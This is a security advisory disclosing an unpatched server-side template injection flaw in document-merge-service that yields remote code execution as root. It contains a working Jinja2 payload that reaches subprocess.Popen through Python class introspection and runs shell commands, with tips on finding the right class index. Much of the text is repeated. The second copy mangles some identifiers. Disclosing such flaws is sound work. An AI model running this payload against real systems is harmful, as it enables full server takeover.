Headline
GHSA-v5gf-r78h-55q6: document-merge-service vulnerable to Remote Code Execution via Server-Side Template Injection
Impact
What kind of vulnerability is it? Who is impacted?
RCE via SSTI, as root, full takeover.
Patches
Has the problem been patched? What versions should users upgrade to?
It has not been patched.
References
Are there any links users can visit to find out more?
- https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti
POC
Add the following to a document, upload and render it:
{% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %}
ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }}
whoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }}
uname -a:
{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }}
{% endif %}
The index might be different, so to debug this first render a template with {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }}
and then get the index of subprocess.Popen
and replace 202 with that.
Impact
What kind of vulnerability is it? Who is impacted?
RCE via SSTI, as root, full takeover.
Patches
Has the problem been patched? What versions should users upgrade to?
It has not been patched.
References
Are there any links users can visit to find out more?
- https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti
POC
Add the following to a document, upload and render it:
{% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %} ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }}
whoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }}
uname -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }}
{% endif %}
The index might be different, so to debug this first render a template with {{ PLACEHOLDER.class.mro[1].subclasses() }} and then get the index of subprocess.Popen and replace 202 with that.
References
- GHSA-v5gf-r78h-55q6